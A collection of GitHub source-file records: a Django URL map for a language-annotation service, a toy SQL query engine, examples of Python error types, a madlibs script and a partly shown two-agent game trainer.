+{"seq_id":"10084343301","text":"from django.urls import path\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom rest_framework.schemas import get_schema_view\nfrom annotator import views\n\nschema_view = get_schema_view(title='Pastebin API')\n\nurlpatterns = [\n path('schema/', schema_view, name='schema'),\n #path('annotator/', views.snippet_list),\n path('annotator/', views.api_root),\n path('annotator/model/', views.ModelList.as_view(), name='model-list'),\n path('annotator/model/<int:pk>/', views.ModelDetail.as_view(), name='model-detail'),\n path('annotator/model/<int:pk>/train/', views.trainModel, name='model-train'),\n path('annotator/model/<int:mk>/annotate/<int:sk>/', views.annotate, name='model-annotate'),\n\n #path('annotator/model/findByTags/', views.model_list_by_tags),\n #path('annotator/model/findByStatus/', views.model_list_by_status),\n path('annotator/corpus/', views.CorpusList.as_view(), name='corpus-list'),\n path('annotator/corpus/<int:pk>/', views.CorpusDetail.as_view(), name='corpus-detail'),\n path('annotator/corpus/<int:pk>/segments/', views.SegmentsInCorpus.as_view(), name='corpussegment-list'),\n path('annotator/corpus/<int:pk>/addsegments/<str:s_list>/', views.addsegmentstocorpus, name='corpussegment-add'),\n path('annotator/corpus/<int:pk>/removesegments/<str:s_list>/', views.removesegmentsfromcorpus, name='corpussegment-remove'),\n\n path('annotator/segment/', views.SegmentList.as_view(), name='segment-list'),\n path('annotator/segment/<int:pk>/', views.SegmentDetail.as_view(), name='segment-detail'),\n path('annotator/segment/<int:pk>/annotations/', views.AnnotationsInSegment.as_view(), name='annotationsegment-detail'),\n path('annotator/segment/<int:pk>/addannotations/<str:s_list>/', views.addannotationstosegment, name='segmentannot-add'),\n path('annotator/segment/<int:pk>/removeannotations/<str:s_list>/', views.removeannotationsfromsegment, name='segmentannot-remove'),\n path('annotator/segment/<int:sk>/annotate/<int:mk>/', views.annotate, name='annotate'),\n path('annotator/annotation/', views.AnnotationList.as_view(), name='annotation-list'),\n path('annotator/annotation/<int:pk>/', views.AnnotationDetail.as_view(), name='annotation-detail'),\n path('annotator/textannotation/', views.TextAnnotationList.as_view(), name='textannotation-list'),\n path('annotator/textannotation/<int:pk>/', views.TextAnnotationDetail.as_view(), name='textannotation-detail'),\n path('annotator/audioannotation/', views.AudioAnnotationList.as_view(), name='audioannotation-list'),\n path('annotator/audioannotation/<int:pk>/', views.AudioAnnotationDetail.as_view(), name='audioannotation-detail'),\n path('annotator/spantextannotation/', views.SpanTextAnnotationList.as_view(), name='spantextannotation-list'),\n path('annotator/spantextannotation/<int:pk>/', views.SpanTextAnnotationDetail.as_view(), name='spantextannotation-detail'),\n path('users/', views.UserList.as_view(), name='user-list'),\n path('users/<int:pk>/', views.UserDetail.as_view(), name='user-detail'),\n path('', views.list_home, name='list_home'),\n path('index.html', views.list_home, name='list_home'),\n path('annotator/upload/', views.list_home, name='list_home'),\n path('annotator/home/', views.list_home, name='home'),\n path('annotator/irb_consent', views.irb_consent, name='irb_consent'),\n path('annotator/models/', views.list_models, name='models'),\n path('annotator/get_auth_token/', views.get_auth_token, name='get_auth_token'),\n path('annotator/check_auth_token/', views.check_auth_token, name='check_auth_token'),\n path('annotator/get_allosaurus_models/', views.get_allosaurus_models, name='get_allosaurus_models'),\n path('annotator/get_allosaurus_phones/<str:model_name>/<str:lang_id>/', views.get_allosaurus_phones, name='get_allosaurus_phones'),\n path('annotator/ocr-post-correction/', views.ocr_post_correction, name='ocr_post_correction'),\n path('annotator/test_single_source_ocr/', views.test_single_source_ocr, name='test_single_source_ocr'),\n path('annotator/train_single_source_ocr/', views.train_single_source_ocr, name='train_single_source_ocr'),\n path('annotator/ocr/', views.ocr_frontend, name='ocr_frontend'),\n path('annotator/download_file/<str:filename>', views.download_file, name='download_file'),\n path('annotator/kill_job/<str:job_id>', views.kill_job, name='kill_job'),\n path('annotator/profile', views.user_profile, name='user_profile'),\n path('annotator/get_model_ids', views.get_model_ids, name='get_model_ids'),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\nhandler404 = 'annotator.views.view_404'","repo_name":"neulab/cmulab","sub_path":"annotator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4656,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"10622198040","text":"import re\nimport sqlparse\nfrom sqlparse.sql import IdentifierList, Identifier, Where, Comparison, Parenthesis,Function\nfrom sqlparse.tokens import Keyword, DML, Wildcard\nimport csv\n\n\nclass Database:\n def __init__(self, location):\n self.location = location\n self.table_names = [] # all the table names\n self.tables = {} # dictionary of table objects, accessed by Tnames\n self.add_all_tables()\n\n def add_all_tables(self):\n f = open(self.location, \"r\")\n line = f.readline() # begin_table\n while line:\n line = line.split()[0]\n if line == '<begin_table>':\n cols = [] # all column names will be stores here\n line = f.readline()\n if not line or line == '<end_table>':\n return -1\n line = line.split()[0]\n Tname = line # Add table name to list here\n line = f.readline()\n if not line:\n return -1\n while line and line.split()[0] != '<end_table>':\n\n cols.append(line.split()[0])\n line = f.readline()\n\n self.table_names.append(Tname)\n self.tables[Tname] = Table(Tname, cols)\n\n else:\n return -1\n line = f.readline()\n\n\nclass Table():\n def __init__(self, name, cols):\n #print(name)\n self.name = name\n self.cols_names = cols\n self.table = []\n #self.col_dict = {}\n #self.init_col_dicts()\n self.fill_table()\n #self.print_rows()\n\n\n def fill_table(self):\n #f = open(self.name+\".csv\", \"r\")\n #line = f.readline()\n with open(self.name+\".csv\", 'r') as file:\n reader = csv.reader(file)\n for row in reader:\n self.table.append(row)\n\n #while line:\n \n # list_my = line.strip('\\\"\"\\n\\r').split(',')\n # self.table.append(list_my)\n \"\"\"\n for i in range (len(self.cols_names)):\n #print(\"filling \"+list_my[i]+\" at \"+self.cols_names[i])\n self.col_dict[self.cols_names[i]].append(list_my[i])\n \"\"\"\n # line = f.readline()\n\n def print_rows(self):\n for row in self.table:\n print(row)\n\n\nclass Query():\n query = \"\"\n table = None\n dbase = None\n selectboolean = False\n fromboolean = False\n whereboolean = False\n groupbyboolean = False\n havingboolean = False\n orderbyboolean = False\n selectlist = []\n fromlist = []\n wherelist = []\n groupbylist = []\n orderbylist = []\n havinglist = []\n show_columns = []\n orderbycolumn = 0\n\n def __init__(self, query, db):\n self.dbase = db\n self.query = query\n\n def set_booleans(self):\n self.selectboolean = False\n self.fromboolean = False\n self.whereboolean = False\n self.groupbyboolean = False\n self.havingboolean = False\n self.orderbyboolean = False\n\n def add_token_to_list(self, sentence):\n sentence = sentence.replace(',', ' ')\n sentence = sentence.replace('(', ' ')\n sentence = sentence.replace(')', ' ')\n s = sentence.split(' ')\n for word in s:\n if word == ' ' or word == '':\n continue\n if self.selectboolean:\n self.selectlist.append(word)\n\n if self.fromboolean:\n self.fromlist.append(word)\n\n if self.groupbyboolean:\n self.groupbylist.append(word)\n\n if self.havingboolean:\n self.havinglist.append(word)\n\n if self.orderbyboolean:\n self.orderbylist.append(word)\n\n if self.whereboolean:\n self.wherelist.append(word)\n\n def parse_query(self):\n t = self.query\n q = sqlparse.format(t, keyword_case='upper')\n elements = sqlparse.parse(q)[0].tokens\n\n for token in elements:\n if token.ttype is Keyword:\n if token.value.upper() == \"FROM\":\n self.set_booleans()\n self.fromboolean = True\n if token.value.upper() == \"GROUP BY\":\n self.set_booleans()\n self.groupbyboolean = True\n if token.value.upper() == \"AVG\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"COUNT\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"MAX\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"MIN\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"DISTINCT\":\n self.add_token_to_list(token.value)\n if token.value.upper() == \"ORDER BY\":\n self.set_booleans()\n self.orderbyboolean = True\n \n\n if token.ttype is Wildcard:\n self.add_token_to_list(token.value)\n\n if token.ttype is DML:\n if token.value.upper() == \"SELECT\":\n self.set_booleans()\n self.selectboolean = True\n\n if isinstance(token, IdentifierList):\n self.add_token_to_list(token.value)\n\n if isinstance(token, Identifier):\n self.add_token_to_list(token.value)\n \n if isinstance(token, Function):\n self.add_token_to_list(token.value)\n\n if isinstance(token, Where):\n\n self.set_booleans()\n self.whereboolean = True\n self.add_token_to_list(token.value)\n self.set_booleans()\n\n if isinstance(token, Parenthesis):\n temp1 = token.value.replace(')', '')\n temp2 = temp1.replace('(', '')\n self.add_token_to_list(temp2)\n\n\n\n def executQuery(self):\n if len(self.fromlist) == 0:\n print(\"Atleast one table must be selected\")\n return \n if len(self.selectlist) == 0:\n print(\"Atleast one column must be selected\")\n return \n\n #print(\"where list \")\n #print(self.wherelist)\n #print(\"group by list \")\n #print (self.groupbylist)\n #print(\"select list is \")\n #print(self.selectlist)\n #print(\"order by list \")\n #print(self.orderbylist)\n\n\n\n self.loadTables() # from\n self.whereQuery() #where\n self.groupbyQuery() #groupby\n self.selectQuery() #select\n\n\n #print (\"orderbylist\")\n #print(self.orderbylist)\n #print(len(self.table.table))\n #print(\"col names \")\n #print(self.table.cols_names)\n \n self.orderbyQuery()\n self.show_sanitiized_table()\n\n def loadTables(self):\n for table in self.dbase.table_names:\n if table in self.fromlist:\n if self.table == None:\n self.table = self.dbase.tables[table]\n self.table.name = \"query_table\"\n\n else:\n table_temperary = self.dbase.tables[table]\n for cols in table_temperary.cols_names:\n self.table.cols_names.append(cols)\n\n t = []\n for my_row in self.table.table:\n for temp_row in table_temperary.table:\n t1 = my_row+temp_row\n t.append(t1)\n self.table.table = t\n \n \n def is_column(self,x):\n \n if x in self.table.cols_names:\n return True\n if re.search(\"^\\d+$\", x):\n return False\n return False\n\n def get_operator(self,operator):\n if \">\" == operator:\n operator_type = 1\n\n if \">=\" == operator:\n operator_type = 2\n\n if \"<\" == operator:\n operator_type = 3\n\n if \"<=\" == operator:\n operator_type = 4\n\n if \"=\" == operator:\n operator_type = 0\n\n return operator_type\n \n def whereQuery(self):\n\n if len(self.wherelist)==0:\n return\n if \"AND\" in self.wherelist:\n and_or_present = 1\n elif \"OR\" in self.wherelist:\n and_or_present = 2\n else:\n and_or_present = 3\n\n if \">\" in self.wherelist:\n operator_type = 1\n if \">=\" in self.wherelist:\n operator_type = 2\n if \"<\" in self.wherelist:\n operator_type = 3\n if \"<=\" in self.wherelist:\n operator_type = 4\n if \"=\" in self.wherelist:\n operator_type = 0\n newtable1 = []\n newtable2 = []\n newtable = []\n\n \n\n if and_or_present == 3:\n if self.wherelist[1] in self.table.cols_names:\n if self.wherelist[3] in self.table.cols_names:\n newtable = self.resolveWhereQuery(\n operator_type, self.wherelist[1], self.wherelist[3])\n else:\n \n newtable = self.resolveWhereQuery(\n operator_type, self.wherelist[1], int(self.wherelist[3]))\n \n else:\n newtable = self.resolveWhereQuery(\n operator_type, int(self.wherelist[1]), self.wherelist[3])\n\n if and_or_present == 1:\n if self.is_column(self.wherelist[1]):\n p1=self.wherelist[1]\n else:\n p1=int(self.wherelist[1])\n\n if self.is_column(self.wherelist[3]):\n p2=self.wherelist[3]\n else:\n p2=int(self.wherelist[3])\n \n if self.is_column(self.wherelist[5]):\n p3=self.wherelist[5]\n else:\n p3=int(self.wherelist[5])\n \n if self.is_column(self.wherelist[7]):\n p4=self.wherelist[7]\n else:\n p4=int(self.wherelist[7])\n \n \n\n newtable1 = self.resolveWhereQuery(self.get_operator(self.wherelist[2]), p1, p2)\n newtable2 = self.resolveWhereQuery(self.get_operator(self.wherelist[6]),p3, p4)\n\n for row in self.table.table:\n if row in newtable1 and row in newtable2:\n newtable.append(row)\n \n\n\n\n if and_or_present == 2:\n if self.is_column(self.wherelist[1]):\n p1=self.wherelist[1]\n else:\n p1=int(self.wherelist[1])\n\n if self.is_column(self.wherelist[3]):\n p2=self.wherelist[3]\n else:\n p2=int(self.wherelist[3])\n \n if self.is_column(self.wherelist[5]):\n p3=self.wherelist[5]\n else:\n p3=int(self.wherelist[5])\n \n if self.is_column(self.wherelist[7]):\n p4=self.wherelist[7]\n else:\n p4=int(self.wherelist[7])\n \n \n\n newtable1 = self.resolveWhereQuery(self.get_operator(self.wherelist[2]), p1, p2)\n newtable2 = self.resolveWhereQuery(self.get_operator(self.wherelist[6]),p3, p4)\n\n for row in self.table.table:\n if row in newtable1 or row in newtable2:\n newtable.append(row)\n\n self.table.table = newtable \n\n\n def selectQuery(self):\n\n if \"*\" in self.selectlist:\n self.selectlist.remove(\"*\")\n for name in self.table.cols_names:\n self.selectlist.append(name)\n\n if len(self.groupbylist)==0:\n for i in range (0,len(self.selectlist)):\n if self.selectlist[i]==\"MAX\":\n a = i+1\n c = self.selectlist[a]\n self.domaxoncol(c)\n if self.selectlist[i]==\"MIN\":\n a = i+1\n c = self.selectlist[a]\n self.dominoncol(c)\n if self.selectlist[i]==\"AVG\":\n a = i+1\n c = self.selectlist[a]\n self.doavgoncol(c)\n if self.selectlist[i]==\"SUM\":\n a = i+1\n c = self.selectlist[a]\n self.dosumoncol(c)\n if self.selectlist[i]==\"COUNT\":\n a = i+1\n c = self.selectlist[a] \n self.docountoncol(c)\n \n self.table.table = [self.table.table[0]]\n\n else:\n for i in range (0,len(self.selectlist)):\n if self.selectlist[i]==\"MAX\":\n a = i+1\n c = self.selectlist[a]\n \n self.domaxontable(c)\n if self.selectlist[i]==\"MIN\":\n a = i+1\n c = self.selectlist[a]\n \n self.dominontable(c)\n if self.selectlist[i]==\"AVG\":\n a = i+1\n c = self.selectlist[a]\n \n self.doavgontable(c)\n if self.selectlist[i]==\"SUM\":\n a = i+1\n c = self.selectlist[a]\n \n self.dosumontable(c)\n if self.selectlist[i]==\"COUNT\":\n a = i+1\n c = self.selectlist[a]\n \n self.docountontable(c)\n \n self.convertlisttoval()\n \n def domaxoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n self.table.table[0][col_num]=max(r)\n \n def dosumoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n print(r)\n self.table.table[0][col_num]=sum(r)\n \n def dominoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n self.table.table[0][col_num]=min(r)\n\n def doavgoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n self.table.table[0][col_num]= sum(r) / len(r) \n\n def docountoncol(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n r=[]\n for row in self.table.table:\n r.append(int(row[col_num])) \n self.table.table[0][col_num]= len(r)\n\n def docountontable(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = len(row[col_num]) \n\n def domaxontable(self , col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = max(row[col_num])\n\n def dominontable(self , col_name):\n col_num = -1\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = min(row[col_num])\n\n def doavgontable(self,col_name):\n \n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = sum(row[col_num]) / len(row[col_num]) \n\n def dosumontable(self,col_name):\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name ==self.table.cols_names[i]:\n col_num = i\n break\n for row in self.table.table:\n row[col_num] = sum(row[col_num])\n\n def groupbyQuery(self):\n\n if len(self.groupbylist)==0:\n return\n table_3=[]\n col_num = 0\n for i in range (0,len(self.table.cols_names)):\n if self.groupbylist[0] == self.table.cols_names[i]:\n col_num=i\n break\n \n for i in range (0,len(self.table.table)):\n \n \n row1 = self.table.table[i]\n \n\n \n gbv = row1[col_num]\n ispresent = False\n for j in range (0,len(table_3)):\n row2 = table_3[j]\n \n if int(gbv) in row2[col_num] :\n \n for p in range (0,len(row1)):\n if p==col_num:\n continue\n else:\n table_3[j][p].append(int(row1[p]))\n\n \n \n ispresent = True\n break\n\n if not ispresent:\n finallist =[]\n for q in range (0,len(row1)):\n finallist.append([int(row1[q])])\n table_3.append(finallist)\n\n self.table.table = table_3\n \n\n def convertlisttoval(self):\n for row in self.table.table:\n for i in range (0,len(row)):\n if type(row[i])==list and len(row[i])==1:\n row[i] = row[i][0]\n\n \n\n\n def show_sanitiized_table(self): \n flag = False\n distinct = 0\n \n\n for i in range (0,len(self.selectlist)):\n \n if self.selectlist[i] == \"MAX\":\n flag=True\n self.show_columns.append(\"max(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"MIN\":\n flag=True\n self.show_columns.append(\"min(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"AVG\":\n flag=True\n self.show_columns.append(\"avg(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"SUM\":\n flag=True\n self.show_columns.append(\"sum(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"COUNT\":\n flag=True\n self.show_columns.append(\"count(\"+self.selectlist[i+1]+\")\")\n #i=i+1\n elif self.selectlist[i] == \"DISTINCT\":\n distinct=1\n \n else:\n if flag:\n flag=0\n else:\n self.show_columns.append(self.selectlist[i])\n \n \n print (\"show_columns\")\n print(self.show_columns)\n showcols=[]\n for i in range (0,len(self.selectlist)):\n if self.selectlist[i] in self.table.cols_names :\n for j in range (0,len(self.table.cols_names)):\n if self.selectlist[i] == self.table.cols_names[j]:\n showcols.append(j)\n \n\n #print(self.show_columns)\n finaltable = []\n tempo = []\n for row in self.table.table:\n col = []\n for index in showcols:\n col.append(row[index])\n #print(row[index],end = \" \")\n finaltable.append(col)\n #print(\" \")\n \n if distinct==1:\n for row in finaltable:\n if row not in tempo:\n print(row)\n tempo.append(row)\n else:\n for row in finaltable:\n print(row)\n \n\n\n \n \n def getorderbycolumn(self,col_name):\n ordervy = 0\n for i in range (0,len(self.table.cols_names)):\n if col_name == self.table.cols_names[i]:\n ordervy = i\n self.orderbycolumn=i\n print(\"order by col is \"+str(i))\n return \n \n def orderbyQuery(self):\n if len(self.orderbylist)==0:\n return \n\n self.getorderbycolumn(self.orderbylist[0])\n self.table.table.sort(key=self.takeSome)\n #self.table.table.sort(key=lambda x:x.split()[ordervy]\n \"\"\"\n for row in self.table.table:\n print(row)\n \"\"\"\n #\n def takeSome(self,elem):\n #print(elem)\n return elem[self.orderbycolumn]\n \n def resolveWhereQuery(self, operator_type, col1, col2):\n tablefinal = []\n if type(col1) == str and type(col2) == int:\n\n col_num = 0\n for i in range(0, len(self.table.cols_names)):\n if self.table.cols_names[i] == col1:\n col_num = i\n break\n \n if operator_type == 2:\n for row in self.table.table:\n if int(row[col_num]) >= col2:\n tablefinal.append(row)\n\n if operator_type == 3:\n for row in self.table.table:\n if int(row[col_num]) < col2:\n tablefinal.append(row)\n\n if operator_type == 4:\n for row in self.table.table:\n if int(row[col_num]) <= col2:\n tablefinal.append(row)\n\n if operator_type == 0:\n for row in self.table.table:\n if int(row[col_num]) == col2:\n tablefinal.append(row)\n\n if operator_type == 1:\n for row in self.table.table:\n if int(row[col_num]) > col2:\n tablefinal.append(row)\n\n if type(col2) == str and type(col1) == int:\n\n for i in range(0, len(self.table.cols_names)):\n if self.table.cols_names[i] == col2:\n col_num = i\n\n if operator_type == 2:\n for row in self.table.table:\n if col1 >= int(row[col_num]):\n tablefinal.append(row)\n\n if operator_type == 3:\n for row in self.table.table:\n if col1 < int(row[col_num]):\n tablefinal.append(row)\n\n if operator_type == 4:\n for row in self.table.table:\n if col1 <= int(row[col_num]):\n tablefinal.append(row)\n\n if operator_type == 0:\n for row in self.table.table:\n if col1 == int(row[col_num]):\n tablefinal.append(row)\n\n if operator_type == 1:\n for row in self.table.table:\n if col1 > int(row[col_num]):\n tablefinal.append(row)\n\n if type(col2) == str and type(col1) == str:\n cols = []\n for i in range(0, len(self.table.cols_names)):\n if self.table.cols_names[i] == col2 or self.table.cols_names[i] == col1:\n cols.append(i)\n column1 = cols[0]\n column2 = cols[1]\n\n if operator_type == 2:\n for row in self.table.table:\n if int(row[column1]) >= int(row[column2]):\n tablefinal.append(row)\n\n if operator_type == 3:\n for row in self.table.table:\n if int(row[column1]) < int(row[column2]):\n tablefinal.append(row)\n\n if operator_type == 4:\n for row in self.table.table:\n if int(row[column1]) <= int(row[column2]):\n tablefinal.append(row)\n\n if operator_type == 0:\n for row in self.table.table:\n if int(row[column1]) == int(row[column2]):\n tablefinal.append(row)\n\n if operator_type == 1:\n for row in self.table.table:\n if int(row[column1]) > int(row[column2]):\n tablefinal.append(row)\n\n return tablefinal\n\n\n\nabc = \"Select SUM(A),MAX(E) FROM table1,table2 GROUP BY B;\"\nmydb = Database(\"metadata.txt\")\nqueryt = Query(abc, mydb)\n\nqueryt.parse_query()\nqueryt.executQuery()\n\n\n#db=Database(\"metadata.txt\")\n","repo_name":"mastermystery007/mini-sql-engine","sub_path":"finalengine.py","file_name":"finalengine.py","file_ext":"py","file_size_in_byte":25545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"13024763602","text":"from __future__ import annotations\n\nimport abc\nfrom dataclasses import dataclass\nfrom enum import IntEnum\n\nfrom typing_extensions import reveal_type\n\n\nclass CodeInContext1(IntEnum):\n FAIL_TO_DO_SOMETHING = 1\n DISCONNECTED_FROM_SOMEWHERE = 2\n BAD_PASSWORD = 3\n BAD_PRIVATE_KEY = 4\n\n\nclass ErrorInContext1(Exception):\n def __init__(self, code: CodeInContext1, msg: str = \"\") -> None:\n self.code = code\n self.msg = msg\n super().__init__(msg)\n\n\nclass FailToDoSomethingError(ErrorInContext1):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext1.FAIL_TO_DO_SOMETHING, msg)\n\n\nclass DisconnectedFromSomewhereError(ErrorInContext1):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext1.DISCONNECTED_FROM_SOMEWHERE, msg)\n\n\nclass BadPasswordError(ErrorInContext1):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext1.BAD_PASSWORD, msg)\n\n\nclass BadPrivateKeyError(ErrorInContext1):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext1.BAD_PRIVATE_KEY, msg)\n\n\nclass Context1Adapter(metaclass=abc.ABCMeta):\n def do_something(self) -> str:\n raise NotImplementedError\n\n\nclass CodeInContext2(IntEnum):\n FAIL_TO_DO_SOMETHING_ELSE = 1\n DISCONNECTED_FROM_SOMEWHERE_ELSE = 2\n\n\nclass ErrorInContext2(Exception):\n def __init__(self, code: CodeInContext2, msg: str = \"\") -> None:\n self.code = code\n self.msg = msg\n super().__init__(msg)\n\n\nclass FailToDoSomethingElseError(ErrorInContext2):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext2.FAIL_TO_DO_SOMETHING_ELSE, msg)\n\n\nclass DisconnectedFromSomewhereElseError(ErrorInContext2):\n def __init__(self, msg: str = \"\") -> None:\n super().__init__(CodeInContext2.DISCONNECTED_FROM_SOMEWHERE_ELSE, msg)\n\n\nclass Context2Adapter(metaclass=abc.ABCMeta):\n def do_something_else(self, input_value: str) -> int:\n raise NotImplementedError\n\n\nclass DomainCode(IntEnum):\n RETRY_LATER = 0\n NOT_ENOUGH_MONEY = 1\n NOT_OLD_ENOUGH = 2\n NOT_ALLOWED = 3\n INTERNAL_ERROR = 4\n\n\nclass DomainError(Exception):\n def __init__(self, code: DomainCode, msg: str = \"\") -> None:\n self.code = code\n self.msg = msg\n\n\ndef some_condition(value: int) -> bool:\n return value > 18\n\n\n@dataclass\nclass DomainService:\n adapter_1: Context1Adapter\n adapter_2: Context2Adapter\n\n def do_action(self):\n try:\n string_value = self.adapter_1.do_something()\n except FailToDoSomethingError as exc:\n raise DomainError(DomainCode.RETRY_LATER) from exc\n except DisconnectedFromSomewhereError as exc:\n raise DomainError(DomainCode.RETRY_LATER) from exc\n except (BadPasswordError, BadPrivateKeyError) as exc:\n raise DomainError(DomainCode.NOT_ALLOWED) from exc\n except ErrorInContext1 as exc:\n raise DomainError(DomainCode.INTERNAL_ERROR, \"unknown error\") from exc\n\n try:\n result = self.adapter_2.do_something_else(string_value)\n except FailToDoSomethingElseError as exc:\n raise DomainError(DomainCode.INTERNAL_ERROR) from exc\n except DisconnectedFromSomewhereElseError as exc:\n raise DomainError(DomainCode.RETRY_LATER) from exc\n except ErrorInContext2 as exc:\n raise DomainError(DomainCode.INTERNAL_ERROR) from exc\n\n if not some_condition(result):\n raise DomainError(DomainCode.NOT_OLD_ENOUGH)\n return result\n\n\n@dataclass\nclass Usecase:\n service: DomainService\n\n def execute(self):\n result = self.service.do_action()\n return result\n\n\ndef main(adapter1: Context1Adapter, adapter2: Context2Adapter):\n service = DomainService(adapter1, adapter2)\n result = Usecase(service).execute()\n reveal_type(result)\n","repo_name":"charbonnierg/fp-playground","sub_path":"examples/error_types/custom_errors_with_exceptions__wc.py","file_name":"custom_errors_with_exceptions__wc.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"32659498550","text":"import time\n\n#Variables to be put into the madlibs\nadj_list = input(\"Gimme 3 adjectives seperated by a space : \").split()\nadj1 = adj_list[0]\nadj2 = adj_list[1]\nadj3 = adj_list[2]\nadj_list = input(\"Great, now gimme 3 verbs seperated by a space : \").split()\nverb1 = adj_list[0]\nverb2 = adj_list[0]\nverb3 = adj_list[0]\nnoun1 = input(\"now all thats left is one noun :D : \")\n\n\nmadlib = f\"Computer programming is so {adj1}! It makes me so {adj2} to always feel \\nlike I am gonna {verb1}.\" \\\n f\"I like people that are {adj3} and have some {noun1}. \\nUnfortunately I {verb2} as I want to {verb3} right now.\"\n\n\nprint (\"processing\")\ntime.sleep(2)\nprint (\"tada\")\ntime.sleep(1)\nprint(madlib)","repo_name":"paul-coder-646/Learning_Python-","sub_path":"Kylie/madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"74961434417","text":"from interfaces import IAgent\nimport pygame\nimport copy\nimport numpy as np\n\n\nclass Trainer(object):\n def __init__(self, agent1 : IAgent, agent2 : IAgent, gameFunction, epsilon=0.1, playSeed=0, trainSeed=0):\n self.agent1 = agent1\n self.agent2 = agent2\n self.gameFunction = gameFunction\n self.epsilon = epsilon\n self.playSeed = playSeed\n self.trainSeed = trainSeed\n self.resolution = (1920, 1080)\n self.recentOutcomes = None\n\n def run(self, numPlays, numTrains, numRepeatGames, verbose=False, visualise=False):\n print(\"Starting full run: {0} test games, {1} training games, {0} test games\".format(numPlays, numTrains))\n self.play(numPlays, verbose, visualise)\n if verbose:\n p1Wins, p2Wins, draw = self.countOutcomes()\n print(\"Player 1: {} | Player 2: {} | Draws: {}\".format(p1Wins, p2Wins, draw))\n print(\"Finished {} test games\".format(numPlays))\n\n self.train(numTrains, numRepeatGames, verbose)\n print(\"Finished {} training games\".format(numTrains))\n\n self.play(numPlays, verbose, visualise)\n if verbose:\n p1Wins, p2Wins, draw = self.countOutcomes()\n print(\"Player 1: {} | Player 2: {} | Draws: {}\".format(p1Wins, p2Wins, draw))\n print(\"Finished {} test games\".format(numPlays))\n\n def train(self, numGames, numRepeatGames, verbose):\n np.random.seed(self.playSeed)\n interval = numGames / 100\n\n for x in range(numGames):\n if x % numRepeatGames == 0:\n startGame = self.gameFunction()\n game = copy.deepcopy(startGame)\n\n while not game.gameEnded():\n if game.getTurn() == 1:\n makeMove(self.agent1, game, 1, self.epsilon)\n else:\n makeMove(self.agent2, game, 2, self.epsilon)\n\n self.agent1.finalize(game)\n self.agent2.finalize(game)\n\n if verbose and x % interval == 0:\n print(\"\\rTrained %s/%s games - Agent 1: %s - Agent 2: %s\" % (x, numGames, self.agent1.getInfo(), self.agent2.getInfo()), end=\"\")\n if verbose:\n print()\n\n def play(self, numGames, verbose=False, visualise=False):\n np.random.seed(self.playSeed)\n self.recentOutcomes = []\n interval = numGames / 100\n draw = True\n\n if visualise:\n pygame.init()\n pygame.display.set_mode(self.resolution)\n surface = pygame.display.get_surface()\n\n for x in range(numGames):\n game = self.gameFunction()\n\n if visualise:\n p1Wins, p2Wins, draws = self.countOutcomes()\n pygame.display.set_caption(\"Player 1: {} | Player 2: {} | Draws: {}\".format(p1Wins, p2Wins, draws))\n\n while not game.gameEnded():\n if visualise:\n if draw:\n game.draw(surface)\n pygame.display.flip()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n return\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_t:\n draw = not draw\n elif event.key == pygame.K_q:\n pygame.quit()\n return\n\n if game.getTurn() == 1:\n game.makeMove(1, self.agent1.getTrainedMove(game))\n else:\n game.makeMove(2, self.agent2.getTrainedMove(game))\n self.recentOutcomes.append(game.getWinner())\n\n if verbose and x % interval == 0:\n print(\"\\rPlayed %s/%s games\" % (x + 1, numGames), end=\"\")\n if verbose:\n print()\n\n if 